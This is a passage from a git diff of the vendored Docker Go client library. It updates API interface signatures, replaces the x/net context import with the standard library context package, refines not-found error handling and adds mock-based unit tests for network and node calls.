(types.ContainerExecInspect, 
error) ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error @@ -58,27 +68,34 @@ type ContainerAPIClient interface { ContainerStats(ctx context.Context, container string, stream bool) (types.ContainerStats, error) ContainerStart(ctx context.Context, container string, options types.ContainerStartOptions) error ContainerStop(ctx context.Context, container string, timeout *time.Duration) error - ContainerTop(ctx context.Context, container string, arguments []string) (types.ContainerProcessList, error) + ContainerTop(ctx context.Context, container string, arguments []string) (containertypes.ContainerTopOKBody, error) ContainerUnpause(ctx context.Context, container string) error - ContainerUpdate(ctx context.Context, container string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) - ContainerWait(ctx context.Context, container string) (int64, error) + ContainerUpdate(ctx context.Context, container string, updateConfig containertypes.UpdateConfig) (containertypes.ContainerUpdateOKBody, error) + ContainerWait(ctx context.Context, container string, condition containertypes.WaitCondition) (<-chan containertypes.ContainerWaitOKBody, <-chan error) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) } +// DistributionAPIClient defines API client methods for the registry +type DistributionAPIClient interface { + DistributionInspect(ctx context.Context, image, encodedRegistryAuth string) (registry.DistributionInspect, error) +} + // ImageAPIClient defines API client methods for the images type ImageAPIClient interface { ImageBuild(ctx context.Context, context io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, 
error) + BuildCachePrune(ctx context.Context) (*types.BuildCachePruneReport, error) + BuildCancel(ctx context.Context, id string) error ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) - ImageHistory(ctx context.Context, image string) ([]types.ImageHistory, error) + ImageHistory(ctx context.Context, image string) ([]image.HistoryResponseItem, error) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) ImageInspectWithRaw(ctx context.Context, image string) (types.ImageInspect, []byte, error) ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) - ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) + ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDeleteResponseItem, error) ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) ImageSave(ctx context.Context, images []string) (io.ReadCloser, error) ImageTag(ctx context.Context, image, ref string) error @@ -87,13 +104,13 @@ type ImageAPIClient interface { // NetworkAPIClient defines API client methods for the networks type NetworkAPIClient interface { - NetworkConnect(ctx context.Context, networkID, container string, config *network.EndpointSettings) error + NetworkConnect(ctx context.Context, network, container string, config *networktypes.EndpointSettings) error NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) - 
NetworkDisconnect(ctx context.Context, networkID, container string, force bool) error - NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) - NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) + NetworkDisconnect(ctx context.Context, network, container string, force bool) error + NetworkInspect(ctx context.Context, network string, options types.NetworkInspectOptions) (types.NetworkResource, error) + NetworkInspectWithRaw(ctx context.Context, network string, options types.NetworkInspectOptions) (types.NetworkResource, []byte, error) NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) - NetworkRemove(ctx context.Context, networkID string) error + NetworkRemove(ctx context.Context, network string) error NetworksPrune(ctx context.Context, pruneFilter filters.Args) (types.NetworksPruneReport, error) } @@ -107,7 +124,7 @@ type NodeAPIClient interface { // PluginAPIClient defines API client methods for the plugins type PluginAPIClient interface { - PluginList(ctx context.Context) (types.PluginsListResponse, error) + PluginList(ctx context.Context, filter filters.Args) (types.PluginsListResponse, error) PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error @@ -122,11 +139,12 @@ type PluginAPIClient interface { // ServiceAPIClient defines API client methods for the services type ServiceAPIClient interface { ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) - ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) + ServiceInspectWithRaw(ctx context.Context, serviceID string, options types.ServiceInspectOptions) 
(swarm.Service, []byte, error) ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) ServiceRemove(ctx context.Context, serviceID string) error ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) + TaskLogs(ctx context.Context, taskID string, options types.ContainerLogsOptions) (io.ReadCloser, error) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) } @@ -153,10 +171,10 @@ type SystemAPIClient interface { // VolumeAPIClient defines API client methods for the volumes type VolumeAPIClient interface { - VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) + VolumeCreate(ctx context.Context, options volumetypes.VolumeCreateBody) (types.Volume, error) VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) - VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) + VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumeListOKBody, error) VolumeRemove(ctx context.Context, volumeID string, force bool) error VolumesPrune(ctx context.Context, pruneFilter filters.Args) (types.VolumesPruneReport, error) } @@ -169,3 +187,12 @@ type SecretAPIClient interface { SecretInspectWithRaw(ctx context.Context, name string) (swarm.Secret, []byte, error) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error } + +// ConfigAPIClient defines API client methods for configs +type ConfigAPIClient interface { + ConfigList(ctx context.Context, options 
types.ConfigListOptions) ([]swarm.Config, error) + ConfigCreate(ctx context.Context, config swarm.ConfigSpec) (types.ConfigCreateResponse, error) + ConfigRemove(ctx context.Context, id string) error + ConfigInspectWithRaw(ctx context.Context, name string) (swarm.Config, []byte, error) + ConfigUpdate(ctx context.Context, id string, version swarm.Version, config swarm.ConfigSpec) error +} diff --git a/vendor/github.com/docker/docker/client/interface_experimental.go b/vendor/github.com/docker/docker/client/interface_experimental.go index 51da98ecdd..402ffb512c 100644 --- a/vendor/github.com/docker/docker/client/interface_experimental.go +++ b/vendor/github.com/docker/docker/client/interface_experimental.go @@ -1,8 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) type apiClientExperimental interface { diff --git a/vendor/github.com/docker/docker/client/interface_stable.go b/vendor/github.com/docker/docker/client/interface_stable.go index cc90a3cbb9..5502cd7426 100644 --- a/vendor/github.com/docker/docker/client/interface_stable.go +++ b/vendor/github.com/docker/docker/client/interface_stable.go @@ -1,4 +1,4 @@ -package client +package client // import "github.com/docker/docker/client" // APIClient is an interface that clients that talk with a docker server must implement. 
type APIClient interface { diff --git a/vendor/github.com/docker/docker/client/login.go b/vendor/github.com/docker/docker/client/login.go index 600dc7196f..7d66181900 100644 --- a/vendor/github.com/docker/docker/client/login.go +++ b/vendor/github.com/docker/docker/client/login.go @@ -1,17 +1,17 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/http" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/registry" - "golang.org/x/net/context" ) // RegistryLogin authenticates the docker server with a given docker registry. -// It returns UnauthorizerError when the authentication fails. +// It returns unauthorizedError when the authentication fails. func (cli *Client) RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) { resp, err := cli.post(ctx, "/auth", url.Values{}, auth, nil) diff --git a/vendor/github.com/docker/docker/client/network_connect.go b/vendor/github.com/docker/docker/client/network_connect.go index c022c17b5b..5718946134 100644 --- a/vendor/github.com/docker/docker/client/network_connect.go +++ b/vendor/github.com/docker/docker/client/network_connect.go @@ -1,9 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/network" - "golang.org/x/net/context" ) // NetworkConnect connects a container to an existent network in the docker host. 
diff --git a/vendor/github.com/docker/docker/client/network_connect_test.go b/vendor/github.com/docker/docker/client/network_connect_test.go index d472f4520c..07a3ba692e 100644 --- a/vendor/github.com/docker/docker/client/network_connect_test.go +++ b/vendor/github.com/docker/docker/client/network_connect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/network" ) @@ -87,6 +86,10 @@ func TestNetworkConnect(t *testing.T) { return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container) } + if connect.EndpointConfig == nil { + return nil, fmt.Errorf("expected connect.EndpointConfig to be not nil, got %v", connect.EndpointConfig) + } + if connect.EndpointConfig.NetworkID != "NetworkID" { return nil, fmt.Errorf("expected 'NetworkID', got %s", connect.EndpointConfig.NetworkID) } diff --git a/vendor/github.com/docker/docker/client/network_create.go b/vendor/github.com/docker/docker/client/network_create.go index 4067a541ff..41da2ac610 100644 --- a/vendor/github.com/docker/docker/client/network_create.go +++ b/vendor/github.com/docker/docker/client/network_create.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // NetworkCreate creates a new network in the docker host. 
diff --git a/vendor/github.com/docker/docker/client/network_create_test.go b/vendor/github.com/docker/docker/client/network_create_test.go index 0e2457f89c..894c98ebb3 100644 --- a/vendor/github.com/docker/docker/client/network_create_test.go +++ b/vendor/github.com/docker/docker/client/network_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestNetworkCreateError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/network_disconnect.go b/vendor/github.com/docker/docker/client/network_disconnect.go index 24b58e3c12..dd15676656 100644 --- a/vendor/github.com/docker/docker/client/network_disconnect.go +++ b/vendor/github.com/docker/docker/client/network_disconnect.go @@ -1,8 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // NetworkDisconnect disconnects a container from an existent network in the docker host. 
diff --git a/vendor/github.com/docker/docker/client/network_disconnect_test.go b/vendor/github.com/docker/docker/client/network_disconnect_test.go index b54a2b1ccf..b27b955e2e 100644 --- a/vendor/github.com/docker/docker/client/network_disconnect_test.go +++ b/vendor/github.com/docker/docker/client/network_disconnect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestNetworkDisconnectError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/network_inspect.go b/vendor/github.com/docker/docker/client/network_inspect.go index 5ad4ea5bf3..025f6d8757 100644 --- a/vendor/github.com/docker/docker/client/network_inspect.go +++ b/vendor/github.com/docker/docker/client/network_inspect.go @@ -1,30 +1,41 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" + "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // NetworkInspect returns the information for a specific network configured in the docker host. -func (cli *Client) NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) { - networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID) +func (cli *Client) NetworkInspect(ctx context.Context, networkID string, options types.NetworkInspectOptions) (types.NetworkResource, error) { + networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID, options) return networkResource, err } // NetworkInspectWithRaw returns the information for a specific network configured in the docker host and its raw representation. 
-func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) { - var networkResource types.NetworkResource - resp, err := cli.get(ctx, "/networks/"+networkID, nil, nil) +func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string, options types.NetworkInspectOptions) (types.NetworkResource, []byte, error) { + if networkID == "" { + return types.NetworkResource{}, nil, objectNotFoundError{object: "network", id: networkID} + } + var ( + networkResource types.NetworkResource + resp serverResponse + err error + ) + query := url.Values{} + if options.Verbose { + query.Set("verbose", "true") + } + if options.Scope != "" { + query.Set("scope", options.Scope) + } + resp, err = cli.get(ctx, "/networks/"+networkID, query, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return networkResource, nil, networkNotFoundError{networkID} - } - return networkResource, nil, err + return networkResource, nil, wrapResponseError(err, resp, "network", networkID) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/network_inspect_test.go b/vendor/github.com/docker/docker/client/network_inspect_test.go index 1f926d66ba..699bccba67 100644 --- a/vendor/github.com/docker/docker/client/network_inspect_test.go +++ b/vendor/github.com/docker/docker/client/network_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,10 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/network" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestNetworkInspectError(t *testing.T) { @@ -18,20 +22,29 @@ func TestNetworkInspectError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, err := 
client.NetworkInspect(context.Background(), "nothing") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + _, err := client.NetworkInspect(context.Background(), "nothing", types.NetworkInspectOptions{}) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) } -func TestNetworkInspectContainerNotFound(t *testing.T) { +func TestNetworkInspectNotFoundError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } - _, err := client.NetworkInspect(context.Background(), "unknown") - if err == nil || !IsErrNetworkNotFound(err) { - t.Fatalf("expected a containerNotFound error, got %v", err) + _, err := client.NetworkInspect(context.Background(), "unknown", types.NetworkInspectOptions{}) + assert.Check(t, is.Error(err, "Error: No such network: unknown")) + assert.Check(t, IsErrNotFound(err)) +} + +func TestNetworkInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.NetworkInspectWithRaw(context.Background(), "", types.NetworkInspectOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } @@ -46,9 +59,30 @@ func TestNetworkInspect(t *testing.T) { return nil, fmt.Errorf("expected GET method, got %s", req.Method) } - content, err := json.Marshal(types.NetworkResource{ - Name: "mynetwork", - }) + var ( + content []byte + err error + ) + if strings.Contains(req.URL.RawQuery, "scope=global") { + return &http.Response{ + StatusCode: http.StatusNotFound, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + } + + if strings.Contains(req.URL.RawQuery, "verbose=true") { + s := map[string]network.ServiceInfo{ + "web": {}, + } + content, err = 
json.Marshal(types.NetworkResource{ + Name: "mynetwork", + Services: s, + }) + } else { + content, err = json.Marshal(types.NetworkResource{ + Name: "mynetwork", + }) + } if err != nil { return nil, err } @@ -59,11 +93,26 @@ func TestNetworkInspect(t *testing.T) { }), } - r, err := client.NetworkInspect(context.Background(), "network_id") + r, err := client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{}) if err != nil { t.Fatal(err) } if r.Name != "mynetwork" { t.Fatalf("expected `mynetwork`, got %s", r.Name) } + + r, err = client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{Verbose: true}) + if err != nil { + t.Fatal(err) + } + if r.Name != "mynetwork" { + t.Fatalf("expected `mynetwork`, got %s", r.Name) + } + _, ok := r.Services["web"] + if !ok { + t.Fatalf("expected service `web` missing in the verbose output") + } + + _, err = client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{Scope: "global"}) + assert.Check(t, is.Error(err, "Error: No such network: network_id")) } diff --git a/vendor/github.com/docker/docker/client/network_list.go b/vendor/github.com/docker/docker/client/network_list.go index e566a93e23..f16b2f5624 100644 --- a/vendor/github.com/docker/docker/client/network_list.go +++ b/vendor/github.com/docker/docker/client/network_list.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // NetworkList returns the list of networks configured in the docker host. 
diff --git a/vendor/github.com/docker/docker/client/network_list_test.go b/vendor/github.com/docker/docker/client/network_list_test.go index 4d443496ac..5263808cfd 100644 --- a/vendor/github.com/docker/docker/client/network_list_test.go +++ b/vendor/github.com/docker/docker/client/network_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) func TestNetworkListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/network_prune.go b/vendor/github.com/docker/docker/client/network_prune.go index 7352a7f0c5..6418b8b607 100644 --- a/vendor/github.com/docker/docker/client/network_prune.go +++ b/vendor/github.com/docker/docker/client/network_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // NetworksPrune requests the daemon to delete unused networks diff --git a/vendor/github.com/docker/docker/client/network_prune_test.go b/vendor/github.com/docker/docker/client/network_prune_test.go new file mode 100644 index 0000000000..7a5d340e51 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_prune_test.go @@ -0,0 +1,113 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestNetworksPruneError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + 
version: "1.25", + } + + filters := filters.NewArgs() + + _, err := client.NetworksPrune(context.Background(), filters) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworksPrune(t *testing.T) { + expectedURL := "/v1.25/networks/prune" + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + labelFilters := filters.NewArgs() + labelFilters.Add("dangling", "true") + labelFilters.Add("label", "label1=foo") + labelFilters.Add("label", "label2!=bar") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.Args{}, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": "", + }, + }, + { + filters: danglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true}}`, + }, + }, + { + filters: noDanglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + { + filters: labelFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + assert.Check(t, is.Equal(expected, actual)) + } + content, err := json.Marshal(types.NetworksPruneReport{ + NetworksDeleted: []string{"network_id1", "network_id2"}, + }) + if err != nil { + 
return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.25", + } + + report, err := client.NetworksPrune(context.Background(), listCase.filters) + assert.Check(t, err) + assert.Check(t, is.Len(report.NetworksDeleted, 2)) + } +} diff --git a/vendor/github.com/docker/docker/client/network_remove.go b/vendor/github.com/docker/docker/client/network_remove.go index 6bd6748924..12741437be 100644 --- a/vendor/github.com/docker/docker/client/network_remove.go +++ b/vendor/github.com/docker/docker/client/network_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // NetworkRemove removes an existent network from the docker host. func (cli *Client) NetworkRemove(ctx context.Context, networkID string) error { resp, err := cli.delete(ctx, "/networks/"+networkID, nil, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "network", networkID) } diff --git a/vendor/github.com/docker/docker/client/network_remove_test.go b/vendor/github.com/docker/docker/client/network_remove_test.go index 2a7b9640c1..ac40af74e6 100644 --- a/vendor/github.com/docker/docker/client/network_remove_test.go +++ b/vendor/github.com/docker/docker/client/network_remove_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestNetworkRemoveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/node_inspect.go b/vendor/github.com/docker/docker/client/node_inspect.go index abf505d29c..593b2e9f0b 100644 --- a/vendor/github.com/docker/docker/client/node_inspect.go +++ b/vendor/github.com/docker/docker/client/node_inspect.go @@ -1,23 +1,22 @@ -package client +package client // import 
"github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // NodeInspectWithRaw returns the node information. func (cli *Client) NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) { + if nodeID == "" { + return swarm.Node{}, nil, objectNotFoundError{object: "node", id: nodeID} + } serverResp, err := cli.get(ctx, "/nodes/"+nodeID, nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return swarm.Node{}, nil, nodeNotFoundError{nodeID} - } - return swarm.Node{}, nil, err + return swarm.Node{}, nil, wrapResponseError(err, serverResp, "node", nodeID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/node_inspect_test.go b/vendor/github.com/docker/docker/client/node_inspect_test.go index fc13283084..d0fdace7fe 100644 --- a/vendor/github.com/docker/docker/client/node_inspect_test.go +++ b/vendor/github.com/docker/docker/client/node_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestNodeInspectError(t *testing.T) { @@ -30,8 +31,20 @@ func TestNodeInspectNodeNotFound(t *testing.T) { } _, _, err := client.NodeInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrNodeNotFound(err) { - t.Fatalf("expected an nodeNotFoundError error, got %v", err) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a nodeNotFoundError error, got %v", err) + } +} + +func TestNodeInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := 
client.NodeInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } diff --git a/vendor/github.com/docker/docker/client/node_list.go b/vendor/github.com/docker/docker/client/node_list.go index 3e8440f08e..9883f6fc52 100644 --- a/vendor/github.com/docker/docker/client/node_list.go +++ b/vendor/github.com/docker/docker/client/node_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // NodeList returns the list of nodes. @@ -15,7 +15,7 @@ func (cli *Client) NodeList(ctx context.Context, options types.NodeListOptions) query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/client/node_list_test.go b/vendor/github.com/docker/docker/client/node_list_test.go index 0251b5cce4..784a754a59 100644 --- a/vendor/github.com/docker/docker/client/node_list_test.go +++ b/vendor/github.com/docker/docker/client/node_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestNodeListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/node_remove.go b/vendor/github.com/docker/docker/client/node_remove.go index 0a77f3d578..e7a7505715 100644 --- a/vendor/github.com/docker/docker/client/node_remove.go +++ b/vendor/github.com/docker/docker/client/node_remove.go @@ -1,11 +1,10 @@ 
-package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" ) // NodeRemove removes a Node. @@ -17,5 +16,5 @@ func (cli *Client) NodeRemove(ctx context.Context, nodeID string, options types. resp, err := cli.delete(ctx, "/nodes/"+nodeID, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "node", nodeID) } diff --git a/vendor/github.com/docker/docker/client/node_remove_test.go b/vendor/github.com/docker/docker/client/node_remove_test.go index f2f8adc4a3..85f828b849 100644 --- a/vendor/github.com/docker/docker/client/node_remove_test.go +++ b/vendor/github.com/docker/docker/client/node_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,8 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" ) func TestNodeRemoveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/node_update.go b/vendor/github.com/docker/docker/client/node_update.go index 3ca9760282..de32a617fb 100644 --- a/vendor/github.com/docker/docker/client/node_update.go +++ b/vendor/github.com/docker/docker/client/node_update.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // NodeUpdate updates a Node. 
diff --git a/vendor/github.com/docker/docker/client/node_update_test.go b/vendor/github.com/docker/docker/client/node_update_test.go index 613ff104eb..d89e1ed858 100644 --- a/vendor/github.com/docker/docker/client/node_update_test.go +++ b/vendor/github.com/docker/docker/client/node_update_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/ping.go b/vendor/github.com/docker/docker/client/ping.go index 22dcda24fd..85d38adb51 100644 --- a/vendor/github.com/docker/docker/client/ping.go +++ b/vendor/github.com/docker/docker/client/ping.go @@ -1,16 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "fmt" + "context" + "path" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) -// Ping pings the server and return the value of the "Docker-Experimental" & "API-Version" headers +// Ping pings the server and returns the value of the "Docker-Experimental", "OS-Type" & "API-Version" headers func (cli *Client) Ping(ctx context.Context) (types.Ping, error) { var ping types.Ping - req, err := cli.buildRequest("GET", fmt.Sprintf("%s/_ping", cli.basePath), nil, nil) + req, err := cli.buildRequest("GET", path.Join(cli.basePath, "/_ping"), nil, nil) if err != nil { return ping, err } @@ -20,11 +20,13 @@ func (cli *Client) Ping(ctx context.Context) (types.Ping, error) { } defer ensureReaderClosed(serverResp) - ping.APIVersion = serverResp.header.Get("API-Version") + if serverResp.header != nil { + ping.APIVersion = serverResp.header.Get("API-Version") - if serverResp.header.Get("Docker-Experimental") == "true" { - ping.Experimental = true + if serverResp.header.Get("Docker-Experimental") == "true" { + ping.Experimental = true + } + ping.OSType = 
